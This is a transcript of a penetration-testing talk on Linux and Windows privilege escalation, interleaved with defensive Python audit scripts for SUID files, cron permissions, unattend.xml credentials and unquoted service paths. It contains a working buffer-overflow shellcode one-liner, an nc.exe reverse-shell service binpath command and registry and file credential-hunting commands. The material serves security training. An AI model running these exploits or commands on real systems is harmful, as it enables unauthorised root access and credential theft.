How fun of privilege escalation Red Pill2017

  1. How Fun of Privilege Escalation. Ammarit Thongthua, CISSP CISM GXPN, Risk Advisory Manager, Deloitte Thailand
  2. # whoami <Name> Ammarit Thongthua, Khay, Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand; Penetration Tester; Security Consultant </Job> <Education> B.Eng Com, ABAC; M.Sci Cyber Security and Info Assurance, Mahidol Univ.; CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  3. # “Privilege Escalation” Where it sits in an engagement. Pre-Exploitation: information gathering, scanning, enumeration. Exploitation: remote exploitation (gain system access, gain information, denial of service, privilege escalation) and local exploitation (bypass restriction, privilege escalation). Post-Exploitation: gathering sensitive info, managing system/service, pivoting.
  4. # “Privilege Escalation” Privilege ladder. Windows: NT AUTHORITY\System > Administrators > Power Users > Users > Service Users. Unix: Root > Sudoer > Users > Service Users.
  5. # “Privilege Escalation” • Vertical privilege escalation -> gain a higher privilege (e.g. user john -> root) • Horizontal privilege escalation -> gain access as other accounts at the same level (e.g. user john -> service users apache, mysql)
  6. # “Privilege Escalation” Windows ladder (NT AUTHORITY\System > Administrators > Power Users > Users > Service Users). Entry points shown: anonymous FTP, webshell, vulnerable service exploit; then a local exploit to move up.
  7. # “Privilege Escalation” Windows ladder (NT AUTHORITY\System > Administrators > Power Users > Users > Service Users). Entry point shown: unauthorized access as Users, then a local exploit to move up.
  8. # “Privilege Escalation” Windows ladder (NT AUTHORITY\System > Administrators > Power Users > Users > Service Users). Entry point shown: unauthorized access as Users, then a local exploit to move up.
  9. # Remote and Local Exploitation • Remote Exploitation over the network (TCP/UDP), typical service ports: TCP 20/21, TCP 22, TCP 23, TCP 25, UDP 53, TCP 80, UDP 161, TCP 443, TCP 445, TCP/UDP 514, TCP 1433, TCP 1521, TCP 3306, TCP 3389, TCP XXXX
  10. # Remote and Local Exploitation Local techniques: race condition, buffer overflow, heap overflow, kernel exploit, evasion, DLL injection, DLL hijacking, Hot Potato, mis-configured service or file permission
  11. # Remote and Local Exploitation Root
  12. # “Privilege Escalation” What it gives you: • Access to restricted resources/files • System credentials: /etc/shadow, SAM file, Registry, configuration files, encryption keys, system memory • Run privileged commands, set system configuration, install software • Pivoting • Maintain access, backdoor • Key logger, rootkit, traffic dumping • Many more...
  13. # “Privilege Escalation”
  14. # “Privilege Escalation”
  15. # “Privilege Escalation”
  16. # “Privilege Escalation” Ways for Linux • Remote exploit of a vulnerable service running as a high-privilege user • Weak password of high-privilege users • Credentials stored in files with weak permissions: configuration and log files, history, environment ($PATH) • Shell escape (restricted shell, chroot) • Vulnerable applications / programs / services running as high-privilege users • Weak permissions on job/task files run by high-privilege users • Sudoers • System misconfiguration • Kernel exploitation • Remote exploitation via local host
  17. # “Privilege Escalation” Ways for Linux • Remote exploit of a vulnerable service running as a high-privilege user
  18. # “Privilege Escalation” Ways for Linux • Remote exploit of a vulnerable service running as a high-privilege user. On FILE_SERVER: # ps -ef | grep root -> root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  19. # “Privilege Escalation” Ways for Linux • Weak password of high-privilege users: maybe the password is similar to the username, maybe it is a weak password (root, Password, P@ssw0rd, ...)
  20. # “Privilege Escalation” Ways for Linux • Credentials stored in files with weak permissions • Configuration and log files • History • Env, $PATH
  21. # “Privilege Escalation” Ways for Linux • Restricted shell escape https://netsec.ws/?p=337
  22. # “Privilege Escalation” Ways for Linux • Restricted shell escape https://netsec.ws/?p=337 https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  23. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users • Characteristics of a vulnerable program: • Runs as "root" user or group • Has SUID/SGID set • Can be overflowed • Uses static libc (nice to have)
  24. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users • Characteristics of a vulnerable program: • Runs as "root" user or group • Has SUID/SGID set. Enumerate them with: list="$(find / -perm -4000 -o -perm -2000 2>/dev/null)"; for i in $list; do ls -al "$i"; done  or  ls -lR / 2>/dev/null | grep "wsr" | grep "root"
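The two one-liners above tell you what is set-uid/set-gid, not whether any of it is unexpected. The audit below is an added example, not part of the deck: it parses `ls -lR` style output (a constructed sample is embedded) and reports setuid/setgid files owned by root that are missing from a baseline allowlist. The baseline set and the sample paths are assumptions for the demonstration. It also catches the `rwS` case (setuid without execute) that a bare `grep "wsr"` misses.

```python
import re
from typing import List, NamedTuple

# Constructed sample of `ls -lR / 2>/dev/null` output (paths and sizes are made up).
SAMPLE_LISTING = """\
/usr/bin:
total 12
-rwsr-xr-x 1 root root  63960 Feb  7  2020 passwd
-rwsr-xr-x 1 root root 166056 Jan 19  2021 sudo
-rwxr-sr-x 1 root tty   35048 Jan 19  2021 wall
-rwsr-xr-x 1 root root  18744 Jan  1  2017 vul_app
-rwxr-xr-x 1 root root  39768 Feb  7  2020 ls
/opt/backup:
total 4
-rwSr--r-- 1 root root    512 May  2  2017 helper
"""

# Placeholder baseline: the setuid/setgid binaries this host is expected to have.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/wall"}


class Finding(NamedTuple):
    path: str
    mode: str
    owner: str
    group: str
    bits: str  # "setuid", "setgid" or "setuid+setgid"


# mode, link count, owner, group, size, month, day, time-or-year, name
LINE_RE = re.compile(
    r"^([-dlcbps][rwxsStT-]{9})[.+]?\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$"
)


def parse_setuid_setgid(listing: str) -> List[Finding]:
    """Return every regular file in an `ls -lR` listing with setuid or setgid set."""
    findings: List[Finding] = []
    cwd = ""
    for raw in listing.splitlines():
        line = raw.rstrip()
        if line.endswith(":") and not line.startswith("-"):
            cwd = line[:-1]          # directory header printed by -R
            continue
        if not line.startswith("-"):
            continue                 # skip "total", directories, symlinks, devices
        m = LINE_RE.match(line)
        if not m:
            continue
        mode, owner, group, name = m.groups()
        setuid = mode[3] in "sS"     # user execute slot: s = set-uid + exec, S = set-uid only
        setgid = mode[6] in "sS"     # group execute slot, same convention
        if not (setuid or setgid):
            continue
        bits = "+".join(b for b, on in (("setuid", setuid), ("setgid", setgid)) if on)
        findings.append(Finding(f"{cwd}/{name}", mode, owner, group, bits))
    return findings


def unexpected_privileged(listing: str, baseline=BASELINE) -> List[Finding]:
    """Setuid/setgid files that would hand over root and are not on the baseline."""
    return [
        f for f in parse_setuid_setgid(listing)
        if (f.owner == "root" or f.group == "root") and f.path not in baseline
    ]


if __name__ == "__main__":
    for f in unexpected_privileged(SAMPLE_LISTING):
        print(f"{f.path}: {f.bits} ({f.mode} {f.owner}:{f.group})")
```

Feed it the real listing with `ls -lR / 2>/dev/null > listing.txt` and compare against a baseline captured from a freshly built host; anything that appears later is worth a look, and the `rwS` helper shows why grepping for the literal `wsr` is not enough.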
  25. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users
  26. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users • Characteristics of a vulnerable program: • Can be overflowed
  27. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users. Check the buffer overflow position.
  28. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users. Check the buffer overflow position.
  29. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users. Find a jump gadget: # objdump -d vul_app | grep "jmp" | grep "esp"  or  # ROPgadget --binary vul_app --only "jmp" | grep esp -> 0x08049f0f : jmp %esp
  30. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users. Shellcode for system("/bin//sh"): shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80", placed where esp points after the jmp %esp at 0x08049f0f.
  31. # “Privilege Escalation” Ways for Linux # python -c 'print "A"*612 + "\x0f\x49\x04\x08" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app  -> privilege is dropped (the shell resets the effective uid)
  32. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users # nano /tmp/sh.c
  33. # “Privilege Escalation” Ways for Linux • Vulnerable applications / programs / services running as high-privilege users # python -c 'print "A"*612 + "\x0f\x49\x04\x08" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x74\x6d\x70\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app  (the path bytes now spell /tmp//sh, i.e. the wrapper built from /tmp/sh.c, instead of /bin//sh)
  34. # “Privilege Escalation” Ways for Linux
  35. # “Privilege Escalation” Ways for Linux The real life is not easy!!!! • Canary (buffer overflow detection) • Executable stack prevention (NX, DEP) • Address Space Layout Randomization (ASLR)
  36. # “Privilege Escalation” Ways for Linux But it’s possible to bypass!!! • Canary (buffer overflow detection) -> canary repair • Executable stack prevention (NX, DEP) -> ret2libc, ROP • Address Space Layout Randomization (ASLR) -> static lib, app wrap-up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-82b1d063aa6b&v=&b=&from_search=1
  37. # “Privilege Escalation” Ways for Linux • Weak permissions on job/task files run by high-privilege users: /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly  # ls -Ral /etc/cron*
  38. # “Privilege Escalation” Ways for Linux • Weak permissions on job/task files run by high-privilege users -> reverse shell
  39. # “Privilege Escalation” Ways for Linux • Weak permissions on job/task files run by high-privilege users
  40. # “Privilege Escalation” Ways for Linux
  41. # “Privilege Escalation” Ways for Linux • Weak permissions on job/task files run by high-privilege users
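The cron slides above show the weakness from the attacker's side: a root job whose script, or whose cron entry, a low-privilege user can edit. The following is an added example (not from the deck) that audits a cron.d directory for exactly that: it parses the entries, keeps only jobs that run as root, and flags group/world-writable cron files, scripts and script directories. It stages a small constructed tree under a temp directory so it runs offline; the `root=` parameter remaps absolute script paths into that tree. Ownership is not checked because the staged files all belong to the current user.

```python
import os
import stat
import tempfile
from typing import List, NamedTuple


class CronFinding(NamedTuple):
    cron_file: str   # file under cron.d that defines the job
    user: str        # account the job runs as
    command: str     # command field of the entry
    problem: str     # why a low-privilege user could influence the job


# Constructed /etc/cron.d entries (format: m h dom mon dow user command).
SAMPLE_CRON_D = {
    "backup":  "# nightly backup\n0 2 * * * root /opt/scripts/backup.sh\n",
    "cleanup": "*/5 * * * * root /usr/local/bin/cleanup.sh --quiet\n",
    "stats":   "30 1 * * * nobody /usr/local/bin/stats.sh\n",
}


def _loose(path: str) -> bool:
    """True when group or others may write to the path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_d(cron_dir: str, root: str = "/") -> List[CronFinding]:
    """Flag root jobs whose cron file, script or script directory is writable by
    group/others. `root` lets the audit run against a staged tree."""
    findings: List[CronFinding] = []
    for fname in sorted(os.listdir(cron_dir)):
        cron_path = os.path.join(cron_dir, fname)
        if not os.path.isfile(cron_path):
            continue
        with open(cron_path) as fh:
            for raw in fh:
                line = raw.strip()
                if not line or line.startswith("#"):
                    continue
                fields = line.split(None, 6)   # five time fields, user, command
                if len(fields) < 7:
                    continue
                user, command = fields[5], fields[6]
                if user != "root":
                    continue                  # only jobs that would hand over root matter here
                script = command.split()[0]
                target = os.path.join(root, script.lstrip("/"))
                if _loose(cron_path):
                    findings.append(CronFinding(fname, user, command, "cron file is group/world-writable"))
                if os.path.exists(target):
                    if _loose(target):
                        findings.append(CronFinding(fname, user, command, "script is group/world-writable"))
                    if _loose(os.path.dirname(target)):
                        findings.append(CronFinding(fname, user, command, "script directory is group/world-writable"))
    return findings


def build_sample_tree() -> str:
    """Stage a constructed filesystem under a temp dir mirroring SAMPLE_CRON_D."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    layout = {
        "opt/scripts/backup.sh": 0o777,     # anyone can edit what root will run
        "usr/local/bin/cleanup.sh": 0o755,
        "usr/local/bin/stats.sh": 0o777,    # loose, but the job runs as nobody
    }
    for rel, mode in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, mode)
    for d in ("opt/scripts", "usr/local/bin"):
        os.chmod(os.path.join(root, d), 0o755)
    cron_dir = os.path.join(root, "etc/cron.d")
    os.makedirs(cron_dir)
    for name, body in SAMPLE_CRON_D.items():
        path = os.path.join(cron_dir, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o666 if name == "cleanup" else 0o644)  # cleanup's entry itself is editable
    return root


def run_sample_audit() -> List[CronFinding]:
    tree = build_sample_tree()
    return audit_cron_d(os.path.join(tree, "etc/cron.d"), root=tree)


if __name__ == "__main__":
    for f in run_sample_audit():
        print(f"{f.cron_file}: {f.problem}: {f.command} (as {f.user})")
```

On a live host run `audit_cron_d("/etc/cron.d")` and extend the same check to /etc/crontab and the cron.hourly/daily/weekly/monthly directories; the fix for every finding is the same: root-owned, mode 0644 entries and 0755 scripts in root-owned directories.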
  42. # “Privilege Escalation” Ways for Linux • Sudoers (the compromised user may already be in the sudoers list)
  43. # “Privilege Escalation” Ways for Linux • System misconfiguration
  44. # “Privilege Escalation” Ways for Linux • Kernel exploitation, e.g. DirtyCOW
  45. # “Privilege Escalation” Ways for Linux • Kernel exploitation (trick), e.g. Linux version 2.6.9-89.EL • Compile the exploit on the target system or in a target-like environment • Metasploitable is a good environment for compiling exploits
  46. # “Privilege Escalation” Ways for Linux • Remote exploitation via local host (127.0.0.1): # ps -ef | grep root -> root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  47. # “Privilege Escalation” Ways for Linux • [Linux privilege escalation scripts and commands] Ref: https://netsec.ws/?p=309 • LinEnum http://www.rebootuser.com/?p=1758 • LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py • Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  48. # “Privilege Escalation” Ways for Linux • LinuxPrivChecker
  49. # “Privilege Escalation” Ways for Linux • LinuxPrivChecker
  50. # “Privilege Escalation” Ways for Linux • Case Study:
  51. # “Privilege Escalation” Ways for Linux • Case Study:
  52. # “Privilege Escalation” Ways for Linux • Case Study: but no exploit detail in exploit-db!!!
  53. # “Privilege Escalation” Ways for Linux • Case Study:
  54. # “Privilege Escalation” Ways for Linux • Case Study:
  55. # “Privilege Escalation” Ways for Linux • Case Study (diagram labels): Low Priv, Other Unix Servers, Dirty Cow, Default password, Crack root pass, root, Bypass Restrict Shell, CMC
  56. # “Privilege Escalation” Ways for Windows • Remote exploit of a vulnerable service running as a high-privilege user • Weak password of high-privilege users • Credentials stored in files and the Registry • Vulnerable applications / programs / services running as high-privilege users • Weak permissions on job/task files run by high-privilege users • System misconfiguration • Kernel exploitation • Pass-the-hash • DLL injection • DLL hijacking • Remote exploitation via local host • Hot Potato • Many more…
  57. # Remote Exploit to escalate privilege • Exploit a vulnerable service running as a high-privilege user
  58. # Remote Exploit to escalate privilege • Exploit a vulnerable service running as a high-privilege user. Credit: Worawit Wangwarunyoo (sleepya)
  59. # “Privilege Escalation” Ways for Windows • Exploit a vulnerability or misconfiguration of a service running as a high-privilege user
  60. # “Privilege Escalation” Ways for Windows • Exploit a vulnerability or misconfiguration of a service running as a high-privilege user
  61. # Remote Exploit to escalate privilege • Exploit a vulnerability or misconfiguration of a service running as a high-privilege user -> WebShell
  62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  64. # “Privilege Escalation” Ways for Windows • PS Migration
  65. # “Privilege Escalation” Ways for Windows • PS Migration
  66. # “Privilege Escalation” Ways for Windows • PS Migration
  67. # Remote Exploit to escalate privilege • Credentials stored in files: findstr /si password *.txt ; findstr /si password *.xml ; findstr /si password *.ini (also try the keywords Pass, PASS, PWD)
  68. # Remote Exploit to escalate privilege • Credentials stored in files: c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml ; dir c:\*vnc.ini /s /b ; dir c:\*ultravnc.ini /s /b ; dir c:\ /s /b | findstr /si *vnc.ini
  69. # Remote Exploit to escalate privilege • Credentials stored in DC policy script files (\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies) https://adsecurity.org/?p=2288
  70. # Remote Exploit to escalate privilege • Credentials stored in the registry: # VNC: reg query "HKCU\Software\ORL\WinVNC3\Password" ; # Windows autologon: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ; # SNMP parameters: reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" ; # PuTTY: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" ; # Search for "password" in the registry: reg query HKLM /f password /t REG_SZ /s ; reg query HKCU /f password /t REG_SZ /s
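The unattend/sysprep files listed two slides up are the usual place deployment credentials survive, and `findstr /si password` only tells you the word occurs somewhere. The following is an added example, not from the deck, of a targeted check: it parses an unattend.xml (an abridged, constructed sample is embedded; every value in it is fake) and reports each password element that still holds a value, where it sits and whether PlainText is set. It deliberately returns the location rather than the secret, which is what an audit report needs. Treating a missing PlainText flag as plaintext is an assumption made here so the check errs towards reporting.

```python
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Optional


class CredentialHit(NamedTuple):
    element: str      # path of the element holding the credential
    plaintext: bool   # PlainText flag; false only means base64-obfuscated, not encrypted
    username: str     # account the credential belongs to


# Constructed, abridged unattend.xml left behind after deployment (fake values).
SAMPLE_UNATTEND = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UEBzc3cwcmQhUGFzc3dvcmQ=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>P@ssw0rd!</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

# Elements in the unattend schema that carry a Value/PlainText pair.
PASSWORD_TAGS = {"Password", "AdministratorPassword"}


def _local(tag: str) -> str:
    """Drop the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]


def _child_text(node: ET.Element, name: str) -> Optional[str]:
    for child in node:
        if _local(child.tag) == name and child.text and child.text.strip():
            return child.text.strip()
    return None


def find_unattend_credentials(xml_text: str) -> List[CredentialHit]:
    """Walk the document and report every password element that still has a value."""
    hits: List[CredentialHit] = []

    def walk(node: ET.Element, path: str, account: str) -> None:
        name = _local(node.tag)
        here = f"{path}/{name}" if path else name
        # AutoLogon names the account as a sibling of its Password block
        account = _child_text(node, "Username") or account
        if name in PASSWORD_TAGS and _child_text(node, "Value"):
            flag = (_child_text(node, "PlainText") or "true").lower() == "true"
            owner = "Administrator" if name == "AdministratorPassword" else account
            hits.append(CredentialHit(here, flag, owner))
        for child in node:
            walk(child, here, account)

    walk(ET.fromstring(xml_text), "", "")
    return hits


if __name__ == "__main__":
    for h in find_unattend_credentials(SAMPLE_UNATTEND):
        kind = "plaintext" if h.plaintext else "base64-obfuscated"
        print(f"{h.element}: {kind} credential for {h.username}")
```

Run it over every file the slide lists (c:\unattend.xml, the Panther copies, sysprep.xml); a hit means the file should be removed after deployment and the account's password rotated, since the "false" case is only encoding.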
  71. # Remote Exploit to escalate privilege • Credentials stored in the registry
  72. # Remote Exploit to escalate privilege
  73. # Remote Exploit to escalate privilege Windows Server 2012 http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
  74. # Remote Exploit to escalate privilege
  75. # Remote Exploit to escalate privilege • Token impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  76. # “Privilege Escalation” Ways for Windows • Insecure service permissions
  77. # “Privilege Escalation” Ways for Windows • Insecure service permissions -> modify binpath https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  78. # “Privilege Escalation” Ways for Windows • Insecure service permissions -> modify binpath https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  79. # “Privilege Escalation” Ways for Windows • Insecure service permissions -> modify binpath (example)
  80. # “Privilege Escalation” Ways for Windows • Insecure service permissions -> modify binpath (example): sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.110 5555 -e C:\WINDOWS\System32\cmd.exe"
  81. # “Privilege Escalation” Ways for Windows • Insecure service permissions by msf
  82. # “Privilege Escalation” Ways for Windows
  83. # “Privilege Escalation” Ways for Windows • Unquoted service paths. When Windows attempts to run this service, it looks at the following paths in order and runs the first EXE it finds: Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  84. # “Privilege Escalation” Ways for Windows • Unquoted service paths Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  85. # “Privilege Escalation” Ways for Windows • Unquoted service paths
  86. # “Privilege Escalation” Ways for Windows • Unquoted service paths
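The list of paths Windows tries (slide 83) was a screenshot, so here is the rule written out as an added example that is not part of the deck: for an unquoted BINARY_PATH_NAME, CreateProcess splits the command line at each space and tries every prefix in turn, appending .exe when the prefix has no extension, until it reaches the real binary. The audit below reproduces that lookup over a constructed set of service path values (the service names and paths are assumptions) and reports the services where more than one candidate exists; a quoted path, or a path with no spaces, yields a single candidate and is safe.

```python
from typing import Dict, List, NamedTuple


class ServiceCheck(NamedTuple):
    name: str
    image_path: str
    quoted: bool
    candidates: List[str]   # files tried in order before the intended binary is reached


# Constructed sample of BINARY_PATH_NAME values as `sc qc <service>` prints them.
SAMPLE_SERVICES: Dict[str, str] = {
    "VulnSvc": r"C:\Program Files\Vuln App\bin\svc.exe -k netsvcs",
    "GoodSvc": r'"C:\Program Files\Good App\svc.exe" -k netsvcs',
    "SysSvc":  r"C:\Windows\system32\svchost.exe -k LocalService",
}


def candidate_paths(image_path: str) -> List[str]:
    """Reproduce the lookup Windows performs on an unquoted command line: split at
    every space and try each prefix, appending .exe when the prefix has no
    extension, stopping at the first prefix that already ends in .exe."""
    tokens = image_path.split(" ")
    out: List[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            out.append(prefix)
            break
        out.append(prefix + ".exe")
    return out


def check_service(name: str, image_path: str) -> ServiceCheck:
    """A leading double quote means the path is delimited and no splitting happens."""
    quoted = image_path.startswith('"')
    return ServiceCheck(name, image_path, quoted, [] if quoted else candidate_paths(image_path))


def unquoted_path_risks(services: Dict[str, str]) -> List[ServiceCheck]:
    """Services whose unquoted path yields more than one candidate: a file planted at
    any earlier candidate location would be started instead of the intended binary."""
    return [
        c for c in (check_service(n, p) for n, p in services.items())
        if not c.quoted and len(c.candidates) > 1
    ]


if __name__ == "__main__":
    for svc in unquoted_path_risks(SAMPLE_SERVICES):
        print(f"{svc.name}: {svc.image_path}")
        for cand in svc.candidates:
            print(f"    tries {cand}")
```

For a real inventory feed it the output of `wmic service get name,pathname` or the ImagePath values from HKLM\SYSTEM\CurrentControlSet\Services; the remediation is simply to quote the path in the service's binary path, which collapses the candidate list to one entry.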
  87. # “Privilege Escalation” Ways for Windows
  88. # “Privilege Escalation” Ways for Windows
  89. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067
  90. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067
  91. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067 GGEZ
  92. # “Privilege Escalation” Ways for Windows • DLL hijacking https://msitpros.com/?p=2012 The way that Windows loads DLLs is to search the following directories in this order: – the directory from which the application loaded – C:\Windows\System32 – C:\Windows\System – C:\Windows – the current working directory – directories in the system PATH environment variable – directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
  93. # “Privilege Escalation” Ways for Windows • DLL hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  94. # “Privilege Escalation” Ways for Windows • DLL hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  95. # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  96. # “Privilege Escalation” Ways for Windows • DLL hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  97. # “Privilege Escalation” Ways for Windows • Driver exploitation
  98. # “Privilege Escalation” Ways for Windows • Driver exploitation example: Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation https://www.exploit-db.com/exploits/42665/
  99. # “Privilege Escalation” Ways for Windows • Hot Potato
  100. # “Privilege Escalation” Ways for Windows • Hot Potato: manually add a user using the Hot Potato technique
  101. # “Privilege Escalation” Ways for Windows • Pass-the-Hash
  102. # “Privilege Escalation” Ways for Windows • Remote exploit on the localhost
  103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  105. # “Privilege Escalation” Ways for Windows • Local exploit to escalate privilege
  106. # “Privilege Escalation” Ways for Windows
  107. # “Privilege Escalation” Ways for Windows • Local exploit to escalate privilege
  108. # “Privilege Escalation” Ways for Windows
  109. # “Privilege Escalation” Ways for Windows dpkg --add-architecture i386 && apt-get update && apt-get install wine32 ; pip install pyinstaller
  110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  111. # “Privilege Escalation” Ways for Windows
  112. # “Privilege Escalation” Ways for Windows
  113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 (diagram: DC1, Servers, Client PC, Unpatched)
  114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 (diagram: DC1, Servers, Client PC, Unpatched)
  117. # “Privilege Escalation” on other devices • Mobile phone: root or jailbreak, DirtyCow • Network device: remote exploit (EXTRABACON exploit), backdooring (ROM0), password cracking of high-privilege accounts
  118. # “Privilege Escalation” on other devices
  119. # Prevention • Secure by design • System hardening: disable unused services; disable/remove unused programs, users and backup files; install endpoint security • Strong access control and authentication • Least privilege • Patch management • Security assessment: vulnerability assessment, penetration testing
  120. Q & A
  121. Thank You. Ammarit Thongthua, CISSP CISM GXPN, Risk Advisory Manager, Deloitte Thailand
  122. # References • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection